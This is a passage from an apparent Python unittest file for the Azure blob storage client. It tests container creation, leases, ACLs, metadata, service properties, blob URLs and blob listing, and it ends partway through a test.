web_rsrc.path = '/' + resource_path
web_rsrc.request_url = '/' + resource_path
return sas.sign_request(web_rsrc)
    def _get_request(self, host, url):
        # Raw GET (no body) -- used to probe public / SAS-signed access.
        return self._web_request('GET', host, url, None)
    def _put_request(self, host, url, content):
        # Raw PUT of `content` bytes.
        return self._web_request('PUT', host, url, content)
    def _del_request(self, host, url):
        # Raw DELETE (no body).
        return self._web_request('DELETE', host, url, None)
def _web_request(self, method, host, url, content):
connection = httplib.HTTPConnection(host)
connection.putrequest(method, url)
connection.putheader('Content-Type', 'application/octet-stream;Charset=UTF-8')
if content is not None:
connection.putheader('Content-Length', str(len(content)))
connection.endheaders()
if content is not None:
connection.send(content)
resp = connection.getresponse()
resp.getheaders()
respbody = None
if resp.length is None:
respbody = resp.read()
elif resp.length > 0:
respbody = resp.read(resp.length)
return respbody
#--Test cases for blob service --------------------------------------------
def test_create_blob_service_missing_arguments(self):
# Arrange
if os.environ.has_key(AZURE_STORAGE_ACCOUNT):
del os.environ[AZURE_STORAGE_ACCOUNT]
if os.environ.has_key(AZURE_STORAGE_ACCESS_KEY):
del os.environ[AZURE_STORAGE_ACCESS_KEY]
if os.environ.has_key(EMULATED):
del os.environ[EMULATED]
# Act
with self.assertRaises(WindowsAzureError):
bs = BlobService()
# Assert
def test_create_blob_service_env_variables(self):
# Arrange
os.environ[AZURE_STORAGE_ACCOUNT] = credentials.getStorageServicesName()
os.environ[AZURE_STORAGE_ACCESS_KEY] = credentials.getStorageServicesKey()
# Act
bs = BlobService()
if os.environ.has_key(AZURE_STORAGE_ACCOUNT):
del os.environ[AZURE_STORAGE_ACCOUNT]
if os.environ.has_key(AZURE_STORAGE_ACCESS_KEY):
del os.environ[AZURE_STORAGE_ACCESS_KEY]
# Assert
self.assertIsNotNone(bs)
self.assertEquals(bs.account_name, credentials.getStorageServicesName())
self.assertEquals(bs.account_key, credentials.getStorageServicesKey())
self.assertEquals(bs.is_emulated, False)
def test_create_blob_service_emulated_true(self):
    """EMULATED='true' makes BlobService target the storage emulator."""
    # Arrange
    os.environ[EMULATED] = 'true'
    try:
        # Act
        bs = BlobService()
    finally:
        # Clean up even on failure ('in' replaces the Python-2-only has_key).
        if EMULATED in os.environ:
            del os.environ[EMULATED]
    # Assert
    self.assertIsNotNone(bs)
    self.assertEqual(bs.account_name, DEV_ACCOUNT_NAME)
    self.assertEqual(bs.account_key, DEV_ACCOUNT_KEY)
    self.assertEqual(bs.is_emulated, True)
def test_create_blob_service_emulated_false(self):
    """EMULATED='false' with no account settings must raise."""
    # Arrange
    os.environ[EMULATED] = 'false'
    try:
        # Act / Assert
        with self.assertRaises(WindowsAzureError):
            bs = BlobService()
    finally:
        # Clean up even on failure ('in' replaces the Python-2-only has_key).
        if EMULATED in os.environ:
            del os.environ[EMULATED]
def test_create_blob_service_emulated_false_env_variables(self):
    """EMULATED='false' falls back to the account environment variables."""
    # Arrange
    os.environ[EMULATED] = 'false'
    os.environ[AZURE_STORAGE_ACCOUNT] = credentials.getStorageServicesName()
    os.environ[AZURE_STORAGE_ACCESS_KEY] = credentials.getStorageServicesKey()
    try:
        # Act
        bs = BlobService()
    finally:
        # Clean up even on failure ('in' replaces the Python-2-only has_key).
        for key in (EMULATED, AZURE_STORAGE_ACCOUNT, AZURE_STORAGE_ACCESS_KEY):
            if key in os.environ:
                del os.environ[key]
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertIsNotNone(bs)
    self.assertEqual(bs.account_name, credentials.getStorageServicesName())
    self.assertEqual(bs.account_key, credentials.getStorageServicesKey())
    self.assertEqual(bs.is_emulated, False)
#--Test cases for containers -----------------------------------------
def test_create_container_no_options(self):
    """create_container with defaults reports success for a new container."""
    result = self.bc.create_container(self.container_name)
    self.assertTrue(result)
def test_create_container_no_options_fail_on_exist(self):
    """fail_on_exist=True still succeeds for a brand-new container."""
    result = self.bc.create_container(self.container_name, None, None, True)
    self.assertTrue(result)
def test_create_container_with_already_existing_container(self):
    """A second create of the same container reports False, not an error."""
    first = self.bc.create_container(self.container_name)
    second = self.bc.create_container(self.container_name)
    self.assertTrue(first)
    self.assertFalse(second)
def test_create_container_with_already_existing_container_fail_on_exist(self):
    """fail_on_exist=True raises when the container already exists."""
    result = self.bc.create_container(self.container_name)
    with self.assertRaises(WindowsAzureError):
        self.bc.create_container(self.container_name, None, None, True)
    self.assertTrue(result)
def test_create_container_with_public_access_container(self):
    """A container created with 'container' public access exposes an ACL."""
    result = self.bc.create_container(self.container_name, None, 'container')
    self.assertTrue(result)
    self.assertIsNotNone(self.bc.get_container_acl(self.container_name))
def test_create_container_with_public_access_blob(self):
    """A container created with 'blob' public access exposes an ACL."""
    result = self.bc.create_container(self.container_name, None, 'blob')
    self.assertTrue(result)
    self.assertIsNotNone(self.bc.get_container_acl(self.container_name))
def test_create_container_with_metadata(self):
    """Metadata passed at creation is readable as x-ms-meta-* headers."""
    # Act
    created = self.bc.create_container(self.container_name, {'hello':'world', 'foo':'42'})
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertTrue(created)
    md = self.bc.get_container_metadata(self.container_name)
    self.assertIsNotNone(md)
    self.assertEqual(md['x-ms-meta-hello'], 'world')
    self.assertEqual(md['x-ms-meta-foo'], '42')
def test_list_containers_no_options(self):
    """list_containers yields an iterable that includes the new container."""
    self.bc.create_container(self.container_name)
    containers = self.bc.list_containers()
    # Iterate once to prove the listing supports iteration.
    for item in containers:
        _ = item.name
    self.assertIsNotNone(containers)
    self.assertGreaterEqual(len(containers), 1)
    self.assertIsNotNone(containers[0])
    self.assertNamedItemInContainer(containers, self.container_name)
def test_list_containers_with_prefix(self):
    """Prefix filtering returns exactly the matching container."""
    # Arrange
    self.bc.create_container(self.container_name)
    # Act
    containers = self.bc.list_containers(self.container_name)
    # Assert
    self.assertIsNotNone(containers)
    self.assertEqual(len(containers), 1)
    self.assertIsNotNone(containers[0])
    self.assertEqual(containers[0].name, self.container_name)
    # metadata is only populated when include='metadata' is requested
    self.assertIsNone(containers[0].metadata)  # stray trailing ';' removed
def test_list_containers_with_include_metadata(self):
    """include='metadata' populates each listed container's metadata dict."""
    self.bc.create_container(self.container_name)
    self.bc.set_container_metadata(self.container_name, {'hello':'world', 'bar':'43'})
    listed = self.bc.list_containers(self.container_name, None, None, 'metadata')
    self.assertIsNotNone(listed)
    self.assertGreaterEqual(len(listed), 1)
    self.assertIsNotNone(listed[0])
    self.assertNamedItemInContainer(listed, self.container_name)
    self.assertEqual(listed[0].metadata['hello'], 'world')
    self.assertEqual(listed[0].metadata['bar'], '43')
def test_list_containers_with_maxresults_and_marker(self):
    """maxresults pages the listing; next_marker resumes where it stopped."""
    self.additional_container_names = [self.container_name + suffix
                                       for suffix in ('a', 'b', 'c', 'd')]
    for name in self.additional_container_names:
        self.bc.create_container(name)
    first_page = self.bc.list_containers(self.container_name, None, 2)
    second_page = self.bc.list_containers(self.container_name, first_page.next_marker, 2)
    self.assertIsNotNone(first_page)
    self.assertEqual(len(first_page), 2)
    self.assertNamedItemInContainer(first_page, self.container_name + 'a')
    self.assertNamedItemInContainer(first_page, self.container_name + 'b')
    self.assertIsNotNone(second_page)
    self.assertEqual(len(second_page), 2)
    self.assertNamedItemInContainer(second_page, self.container_name + 'c')
    self.assertNamedItemInContainer(second_page, self.container_name + 'd')
def test_set_container_metadata(self):
    """set_container_metadata stores values readable as x-ms-meta-* keys."""
    # Arrange
    self.bc.create_container(self.container_name)
    # Act
    resp = self.bc.set_container_metadata(self.container_name, {'hello':'world', 'bar':'43'})
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertIsNone(resp)
    md = self.bc.get_container_metadata(self.container_name)
    self.assertIsNotNone(md)
    self.assertEqual(md['x-ms-meta-hello'], 'world')
    self.assertEqual(md['x-ms-meta-bar'], '43')
def test_set_container_metadata_with_lease_id(self):
    """Metadata can be set on a leased container with the matching lease id."""
    # Arrange
    self.bc.create_container(self.container_name)
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    # Act
    resp = self.bc.set_container_metadata(self.container_name, {'hello':'world', 'bar':'43'}, lease['x-ms-lease-id'])
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertIsNone(resp)
    md = self.bc.get_container_metadata(self.container_name)
    self.assertIsNotNone(md)
    self.assertEqual(md['x-ms-meta-hello'], 'world')
    self.assertEqual(md['x-ms-meta-bar'], '43')
def test_set_container_metadata_with_non_matching_lease_id(self):
    """Setting metadata with the wrong lease id must be rejected."""
    self.bc.create_container(self.container_name)
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    bogus_lease_id = '00000000-1111-2222-3333-444444444444'
    with self.assertRaises(WindowsAzureError):
        self.bc.set_container_metadata(self.container_name, {'hello':'world', 'bar':'43'}, bogus_lease_id)
def test_set_container_metadata_with_non_existing_container(self):
    """Setting metadata on a missing container raises."""
    with self.assertRaises(WindowsAzureError):
        self.bc.set_container_metadata(self.container_name, {'hello':'world', 'bar':'43'})
def test_get_container_metadata(self):
    """get_container_metadata returns exactly the metadata headers."""
    # Arrange
    self.bc.create_container(self.container_name)
    self.bc.set_container_acl(self.container_name, None, 'container')
    self.bc.set_container_metadata(self.container_name, {'hello':'world','foo':'42'})
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    # Act
    md = self.bc.get_container_metadata(self.container_name)
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertIsNotNone(md)
    self.assertEqual(2, len(md))
    self.assertEqual(md['x-ms-meta-hello'], 'world')
    self.assertEqual(md['x-ms-meta-foo'], '42')
def test_get_container_metadata_with_lease_id(self):
    """Metadata is readable while presenting the matching lease id."""
    # Arrange
    self.bc.create_container(self.container_name)
    self.bc.set_container_acl(self.container_name, None, 'container')
    self.bc.set_container_metadata(self.container_name, {'hello':'world','foo':'42'})
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    # Act
    md = self.bc.get_container_metadata(self.container_name, lease['x-ms-lease-id'])
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertIsNotNone(md)
    self.assertEqual(2, len(md))
    self.assertEqual(md['x-ms-meta-hello'], 'world')
    self.assertEqual(md['x-ms-meta-foo'], '42')
def test_get_container_metadata_with_non_matching_lease_id(self):
    """Reading metadata with a wrong lease id is rejected."""
    self.bc.create_container(self.container_name)
    self.bc.set_container_acl(self.container_name, None, 'container')
    self.bc.set_container_metadata(self.container_name, {'hello':'world','foo':'42'})
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    bogus_lease_id = '00000000-1111-2222-3333-444444444444'
    with self.assertRaises(WindowsAzureError):
        self.bc.get_container_metadata(self.container_name, bogus_lease_id)
def test_get_container_metadata_with_non_existing_container(self):
    """Reading metadata of a missing container raises."""
    with self.assertRaises(WindowsAzureError):
        self.bc.get_container_metadata(self.container_name)
def test_get_container_properties(self):
    """get_container_properties includes metadata and lease-status headers."""
    # Arrange
    self.bc.create_container(self.container_name)
    self.bc.set_container_acl(self.container_name, None, 'container')
    self.bc.set_container_metadata(self.container_name, {'hello':'world','foo':'42'})
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    # Act
    props = self.bc.get_container_properties(self.container_name)
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertIsNotNone(props)
    self.assertEqual(props['x-ms-meta-hello'], 'world')
    self.assertEqual(props['x-ms-meta-foo'], '42')
    self.assertEqual(props['x-ms-lease-duration'], 'fixed')
    self.assertEqual(props['x-ms-lease-state'], 'leased')
    self.assertEqual(props['x-ms-lease-status'], 'locked')
def test_get_container_properties_with_lease_id(self):
    """Properties are readable while presenting the matching lease id."""
    # Arrange
    self.bc.create_container(self.container_name)
    self.bc.set_container_acl(self.container_name, None, 'container')
    self.bc.set_container_metadata(self.container_name, {'hello':'world','foo':'42'})
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    # Act
    props = self.bc.get_container_properties(self.container_name, lease['x-ms-lease-id'])
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertIsNotNone(props)
    self.assertEqual(props['x-ms-meta-hello'], 'world')
    self.assertEqual(props['x-ms-meta-foo'], '42')
    self.assertEqual(props['x-ms-lease-duration'], 'fixed')
    self.assertEqual(props['x-ms-lease-status'], 'locked')
    self.assertEqual(props['x-ms-lease-state'], 'leased')
def test_get_container_properties_with_non_matching_lease_id(self):
    """Reading properties with a wrong lease id is rejected."""
    self.bc.create_container(self.container_name)
    self.bc.set_container_acl(self.container_name, None, 'container')
    self.bc.set_container_metadata(self.container_name, {'hello':'world','foo':'42'})
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    bogus_lease_id = '00000000-1111-2222-3333-444444444444'
    with self.assertRaises(WindowsAzureError):
        self.bc.get_container_properties(self.container_name, bogus_lease_id)
def test_get_container_properties_with_non_existing_container(self):
    """Reading properties of a missing container raises."""
    with self.assertRaises(WindowsAzureError):
        self.bc.get_container_properties(self.container_name)
def test_get_container_acl(self):
    """A fresh container has an ACL with no signed identifiers."""
    self.bc.create_container(self.container_name)
    acl = self.bc.get_container_acl(self.container_name)
    self.assertIsNotNone(acl)
    self.assertEqual(len(acl.signed_identifiers), 0)
def test_get_container_acl_iter(self):
    """The ACL object is directly iterable and empty for a new container."""
    self.bc.create_container(self.container_name)
    acl = self.bc.get_container_acl(self.container_name)
    # Iterating must not raise even when the ACL is empty.
    for _ in acl:
        pass
    self.assertIsNotNone(acl)
    self.assertEqual(len(acl.signed_identifiers), 0)
    self.assertEqual(len(acl), 0)
def test_get_container_acl_with_lease_id(self):
    """The ACL can be read while holding the container lease."""
    self.bc.create_container(self.container_name)
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    acl = self.bc.get_container_acl(self.container_name, lease['x-ms-lease-id'])
    self.assertIsNotNone(acl)
    self.assertEqual(len(acl.signed_identifiers), 0)
def test_get_container_acl_with_non_matching_lease_id(self):
    """Reading the ACL with a wrong lease id is rejected."""
    self.bc.create_container(self.container_name)
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    bogus_lease_id = '00000000-1111-2222-3333-444444444444'
    with self.assertRaises(WindowsAzureError):
        self.bc.get_container_acl(self.container_name, bogus_lease_id)
def test_get_container_acl_with_non_existing_container(self):
    """Reading the ACL of a missing container raises."""
    with self.assertRaises(WindowsAzureError):
        self.bc.get_container_acl(self.container_name)
def test_set_container_acl(self):
    """set_container_acl with defaults succeeds and leaves a readable ACL."""
    self.bc.create_container(self.container_name)
    resp = self.bc.set_container_acl(self.container_name)
    self.assertIsNone(resp)
    self.assertIsNotNone(self.bc.get_container_acl(self.container_name))
def test_set_container_acl_with_lease_id(self):
    """The ACL can be set while holding the container lease."""
    self.bc.create_container(self.container_name)
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    resp = self.bc.set_container_acl(self.container_name, x_ms_lease_id=lease['x-ms-lease-id'])
    self.assertIsNone(resp)
    self.assertIsNotNone(self.bc.get_container_acl(self.container_name))
def test_set_container_acl_with_non_matching_lease_id(self):
    """Setting the ACL with a wrong lease id is rejected."""
    self.bc.create_container(self.container_name)
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    bogus_lease_id = '00000000-1111-2222-3333-444444444444'
    with self.assertRaises(WindowsAzureError):
        self.bc.set_container_acl(self.container_name, x_ms_lease_id=bogus_lease_id)
def test_set_container_acl_with_public_access_container(self):
    """Public access level 'container' is accepted by set_container_acl."""
    self.bc.create_container(self.container_name)
    resp = self.bc.set_container_acl(self.container_name, None, 'container')
    self.assertIsNone(resp)
    self.assertIsNotNone(self.bc.get_container_acl(self.container_name))
def test_set_container_acl_with_public_access_blob(self):
    """Public access level 'blob' is accepted by set_container_acl."""
    self.bc.create_container(self.container_name)
    resp = self.bc.set_container_acl(self.container_name, None, 'blob')
    self.assertIsNone(resp)
    self.assertIsNotNone(self.bc.get_container_acl(self.container_name))
def test_set_container_acl_with_empty_signed_identifiers(self):
    """Setting an empty SignedIdentifiers collection leaves an empty ACL."""
    self.bc.create_container(self.container_name)
    empty_identifiers = SignedIdentifiers()
    resp = self.bc.set_container_acl(self.container_name, empty_identifiers)
    self.assertIsNone(resp)
    acl = self.bc.get_container_acl(self.container_name)
    self.assertIsNotNone(acl)
    self.assertEqual(len(acl.signed_identifiers), 0)
def test_set_container_acl_with_signed_identifiers(self):
    """A stored access policy round-trips through set/get_container_acl."""
    self.bc.create_container(self.container_name)
    policy = SignedIdentifier()
    policy.id = 'testid'
    policy.access_policy.start = '2011-10-11'
    policy.access_policy.expiry = '2011-10-12'
    policy.access_policy.permission = 'r'
    identifiers = SignedIdentifiers()
    identifiers.signed_identifiers.append(policy)
    resp = self.bc.set_container_acl(self.container_name, identifiers)
    self.assertIsNone(resp)
    acl = self.bc.get_container_acl(self.container_name)
    self.assertIsNotNone(acl)
    self.assertEqual(len(acl.signed_identifiers), 1)
    self.assertEqual(len(acl), 1)
    self.assertEqual(acl.signed_identifiers[0].id, 'testid')
    self.assertEqual(acl[0].id, 'testid')
def test_set_container_acl_with_non_existing_container(self):
    """Setting an ACL on a missing container raises."""
    with self.assertRaises(WindowsAzureError):
        self.bc.set_container_acl(self.container_name, None, 'container')
def test_lease_container_acquire_and_release(self):
    """A container lease can be acquired and then released without error."""
    self.bc.create_container(self.container_name)
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    self.bc.lease_container(self.container_name, 'release', x_ms_lease_id=lease['x-ms-lease-id'])
    # Released — teardown no longer needs to release it.
    self.container_lease_id = None
def test_lease_container_renew(self):
    """Renewing extends a 15s lease; delete only succeeds after expiry."""
    # Arrange
    self.bc.create_container(self.container_name)
    lease = self.bc.lease_container(self.container_name, 'acquire', x_ms_lease_duration=15)
    self.container_lease_id = lease['x-ms-lease-id']
    time.sleep(10)
    # Act
    renewed_lease = self.bc.lease_container(self.container_name, 'renew', x_ms_lease_id=lease['x-ms-lease-id'])
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertEqual(lease['x-ms-lease-id'], renewed_lease['x-ms-lease-id'])
    # 5s after the renew the lease is still live, so delete must fail...
    time.sleep(5)
    with self.assertRaises(WindowsAzureError):
        self.bc.delete_container(self.container_name)
    # ...and succeed once the renewed lease has expired.
    time.sleep(10)
    self.bc.delete_container(self.container_name)
def test_lease_container_break_period(self):
    """Breaking with a period keeps the lease enforced until it elapses."""
    self.bc.create_container(self.container_name)
    lease = self.bc.lease_container(self.container_name, 'acquire', x_ms_lease_duration=15)
    self.container_lease_id = lease['x-ms-lease-id']
    self.bc.lease_container(self.container_name, 'break', x_ms_lease_id=lease['x-ms-lease-id'], x_ms_lease_break_period=5)
    time.sleep(5)
    with self.assertRaises(WindowsAzureError):
        self.bc.delete_container(self.container_name, x_ms_lease_id=lease['x-ms-lease-id'])
def test_lease_container_break_released_lease_fails(self):
    """Breaking a lease that was already released raises."""
    self.bc.create_container(self.container_name)
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    self.bc.lease_container(self.container_name, 'release', lease['x-ms-lease-id'])
    with self.assertRaises(WindowsAzureError):
        self.bc.lease_container(self.container_name, 'break', lease['x-ms-lease-id'])
def test_lease_container_acquire_after_break_fails(self):
    """Re-acquiring immediately after a break raises."""
    self.bc.create_container(self.container_name)
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
    self.bc.lease_container(self.container_name, 'break', lease['x-ms-lease-id'])
    with self.assertRaises(WindowsAzureError):
        self.bc.lease_container(self.container_name, 'acquire')
def test_lease_container_with_duration(self):
    """A 15s lease blocks re-acquisition until it expires."""
    self.bc.create_container(self.container_name)
    lease = self.bc.lease_container(self.container_name, 'acquire', x_ms_lease_duration=15)
    self.container_lease_id = lease['x-ms-lease-id']
    with self.assertRaises(WindowsAzureError):
        self.bc.lease_container(self.container_name, 'acquire')
    # After the fixed duration the lease lapses and acquire succeeds.
    time.sleep(15)
    lease = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease['x-ms-lease-id']
def test_lease_container_with_proposed_lease_id(self):
    """The service honors a client-proposed lease id."""
    # Arrange
    self.bc.create_container(self.container_name)
    # Act
    lease_id = '55e97f64-73e8-4390-838d-d9e84a374321'
    lease = self.bc.lease_container(self.container_name, 'acquire', x_ms_proposed_lease_id=lease_id)
    self.container_lease_id = lease['x-ms-lease-id']
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertIsNotNone(lease)
    self.assertEqual(lease['x-ms-lease-id'], lease_id)
def test_lease_container_change_lease_id(self):
    """The 'change' action swaps an active lease to a proposed id."""
    # Arrange
    self.bc.create_container(self.container_name)
    # Act
    lease_id = '29e0b239-ecda-4f69-bfa3-95f6af91464c'
    lease1 = self.bc.lease_container(self.container_name, 'acquire')
    self.container_lease_id = lease1['x-ms-lease-id']
    lease2 = self.bc.lease_container(self.container_name, 'change', x_ms_lease_id=lease1['x-ms-lease-id'], x_ms_proposed_lease_id=lease_id)
    self.container_lease_id = lease2['x-ms-lease-id']
    # Assert (assertEqual/assertNotEqual replace deprecated *Equals aliases)
    self.assertIsNotNone(lease1)
    self.assertIsNotNone(lease2)
    self.assertNotEqual(lease1['x-ms-lease-id'], lease_id)
    self.assertEqual(lease2['x-ms-lease-id'], lease_id)
def test_delete_container_with_existing_container(self):
    """delete_container returns True and the container disappears."""
    self.bc.create_container(self.container_name)
    deleted = self.bc.delete_container(self.container_name)
    self.assertTrue(deleted)
    remaining = self.bc.list_containers()
    self.assertNamedItemNotInContainer(remaining, self.container_name)
def test_delete_container_with_existing_container_fail_not_exist(self):
    """fail_not_exist=True still succeeds when the container exists."""
    self.bc.create_container(self.container_name)
    deleted = self.bc.delete_container(self.container_name, True)
    self.assertTrue(deleted)
    remaining = self.bc.list_containers()
    self.assertNamedItemNotInContainer(remaining, self.container_name)
def test_delete_container_with_non_existing_container(self):
    """Deleting a missing container reports False by default."""
    self.assertFalse(self.bc.delete_container(self.container_name))
def test_delete_container_with_non_existing_container_fail_not_exist(self):
    """fail_not_exist=True turns a missing container into an error."""
    with self.assertRaises(WindowsAzureError):
        self.bc.delete_container(self.container_name, True)
def test_delete_container_with_lease_id(self):
    """A leased container can be deleted by presenting its lease id."""
    self.bc.create_container(self.container_name)
    lease = self.bc.lease_container(self.container_name, 'acquire', x_ms_lease_duration=15)
    self.container_lease_id = lease['x-ms-lease-id']
    deleted = self.bc.delete_container(self.container_name, x_ms_lease_id=lease['x-ms-lease-id'])
    self.assertTrue(deleted)
    remaining = self.bc.list_containers()
    self.assertNamedItemNotInContainer(remaining, self.container_name)
def test_delete_container_without_lease_id(self):
    """Deleting a leased container without the lease id raises."""
    self.bc.create_container(self.container_name)
    lease = self.bc.lease_container(self.container_name, 'acquire', x_ms_lease_duration=15)
    self.container_lease_id = lease['x-ms-lease-id']
    with self.assertRaises(WindowsAzureError):
        self.bc.delete_container(self.container_name)
#--Test cases for blob service ---------------------------------------
def test_set_blob_service_properties(self):
    """Disabling metrics via set_blob_service_properties round-trips."""
    props = StorageServiceProperties()
    props.metrics.enabled = False
    resp = self.bc.set_blob_service_properties(props)
    self.assertIsNone(resp)
    received = self.bc.get_blob_service_properties()
    self.assertFalse(received.metrics.enabled)
def test_set_blob_service_properties_with_timeout(self):
    """set_blob_service_properties accepts a timeout and still applies."""
    props = StorageServiceProperties()
    props.logging.write = True
    resp = self.bc.set_blob_service_properties(props, 5)
    self.assertIsNone(resp)
    received = self.bc.get_blob_service_properties()
    self.assertTrue(received.logging.write)
def test_get_blob_service_properties(self):
    """get_blob_service_properties returns logging and metrics settings."""
    props = self.bc.get_blob_service_properties()
    self.assertIsNotNone(props)
    self.assertIsInstance(props.logging, Logging)
    self.assertIsInstance(props.metrics, Metrics)
def test_get_blob_service_properties_with_timeout(self):
    """get_blob_service_properties accepts a timeout argument."""
    props = self.bc.get_blob_service_properties(5)
    self.assertIsNotNone(props)
    self.assertIsInstance(props.logging, Logging)
    self.assertIsInstance(props.metrics, Metrics)
#--Test cases for blobs ----------------------------------------------
def test_make_blob_url(self):
    """Default blob URL uses https and the account's public blob endpoint."""
    # Act
    res = self.bc.make_blob_url('vhds', 'my.vhd')
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertEqual(res, 'https://' + credentials.getStorageServicesName() + '.blob.core.windows.net/vhds/my.vhd')
def test_make_blob_url_with_account_name(self):
    """An explicit account_name overrides the service's account."""
    # Act
    res = self.bc.make_blob_url('vhds', 'my.vhd', account_name='myaccount')
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertEqual(res, 'https://myaccount.blob.core.windows.net/vhds/my.vhd')
def test_make_blob_url_with_protocol(self):
    """An explicit protocol replaces the default https scheme."""
    # Act
    res = self.bc.make_blob_url('vhds', 'my.vhd', protocol='http')
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertEqual(res, 'http://' + credentials.getStorageServicesName() + '.blob.core.windows.net/vhds/my.vhd')
def test_make_blob_url_with_host_base(self):
    """An explicit host_base replaces the default blob endpoint suffix."""
    # Act
    res = self.bc.make_blob_url('vhds', 'my.vhd', host_base='.blob.internal.net')
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertEqual(res, 'https://' + credentials.getStorageServicesName() + '.blob.internal.net/vhds/my.vhd')
def test_make_blob_url_with_all(self):
    """account_name, protocol and host_base can all be combined."""
    # Act
    res = self.bc.make_blob_url('vhds', 'my.vhd', account_name='myaccount', protocol='http', host_base='.blob.internal.net')
    # Assert (assertEqual replaces the deprecated assertEquals alias)
    self.assertEqual(res, 'http://myaccount.blob.internal.net/vhds/my.vhd')
def test_list_blobs(self):
    """list_blobs returns the uploaded block blobs with their properties."""
    self._create_container(self.container_name)
    data = 'hello world'
    self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob')
    self.bc.put_blob(self.container_name, 'blob2', data, 'BlockBlob')
    listed = self.bc.list_blobs(self.container_name)
    # Iterate once to prove the listing supports iteration.
    for item in listed:
        _ = item.name
    self.assertIsNotNone(listed)
    self.assertGreaterEqual(len(listed), 2)
    self.assertIsNotNone(listed[0])
    self.assertNamedItemInContainer(listed, 'blob1')
    self.assertNamedItemInContainer(listed, 'blob2')
    self.assertEqual(listed[0].properties.content_length, 11)
    self.assertEqual(listed[1].properties.content_type, 'application/octet-stream Charset=UTF-8')
def test_list_blobs_leased_blob(self):
    """A leased blob's listing shows its lease duration/status/state."""
    self._create_container(self.container_name)
    data = 'hello world'
    self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob')
    lease = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
    listed = self.bc.list_blobs(self.container_name)
    for item in listed:
        _ = item.name
    self.assertIsNotNone(listed)
    self.assertGreaterEqual(len(listed), 1)
    self.assertIsNotNone(listed[0])
    self.assertNamedItemInContainer(listed, 'blob1')
    self.assertEqual(listed[0].properties.content_length, 11)
    self.assertEqual(listed[0].properties.lease_duration, 'fixed')
    self.assertEqual(listed[0].properties.lease_status, 'locked')
    self.assertEqual(listed[0].properties.lease_state, 'leased')
def test_list_blobs_with_prefix(self):
    """Prefix 'bloba' matches exactly the two bloba* blobs."""
    self._create_container(self.container_name)
    data = 'hello world'
    for blob_name in ('bloba1', 'bloba2', 'blobb1'):
        self.bc.put_blob(self.container_name, blob_name, data, 'BlockBlob')
    listed = self.bc.list_blobs(self.container_name, 'bloba')
    self.assertIsNotNone(listed)
    self.assertEqual(len(listed), 2)
    self.assertEqual(len(listed.blobs), 2)
    self.assertEqual(len(listed.prefixes), 0)
    self.assertEqual(listed.prefix, 'bloba')
    self.assertNamedItemInContainer(listed, 'bloba1')
    self.assertNamedItemInContainer(listed, 'bloba2')
def test_list_blobs_with_prefix_and_delimiter(self):
    """Delimiter listing returns direct blobs plus one-level sub-prefixes."""
    self._create_container(self.container_name)
    data = 'hello world'
    blob_names = ['documents/music/pop/thriller.mp3',
                  'documents/music/rock/stairwaytoheaven.mp3',
                  'documents/music/rock/hurt.mp3',
                  'documents/music/rock/metallica/one.mp3',
                  'documents/music/unsorted1.mp3',
                  'documents/music/unsorted2.mp3',
                  'documents/pictures/birthday/kid.jpg',
                  'documents/pictures/birthday/cake.jpg']
    for blob_name in blob_names:
        self.bc.put_blob(self.container_name, blob_name, data, 'BlockBlob')
    listing = self.bc.list_blobs(self.container_name, 'documents/music/', delimiter='/')
    self.assertIsNotNone(listing)
    self.assertEqual(len(listing), 2)
    self.assertEqual(len(listing.blobs), 2)
    self.assertEqual(len(listing.prefixes), 2)
    self.assertEqual(listing.prefix, 'documents/music/')
    self.assertEqual(listing.delimiter, '/')
    self.assertNamedItemInContainer(listing, 'documents/music/unsorted1.mp3')
    self.assertNamedItemInContainer(listing, 'documents/music/unsorted2.mp3')
    self.assertNamedItemInContainer(listing.blobs, 'documents/music/unsorted1.mp3')
    self.assertNamedItemInContainer(listing.blobs, 'documents/music/unsorted2.mp3')
    self.assertNamedItemInContainer(listing.prefixes, 'documents/music/pop/')
    self.assertNamedItemInContainer(listing.prefixes, 'documents/music/rock/')
def test_list_blobs_with_maxresults(self):
    """maxresults=2 limits the listing to the first two blobs by name."""
    self._create_container(self.container_name)
    data = 'hello world'
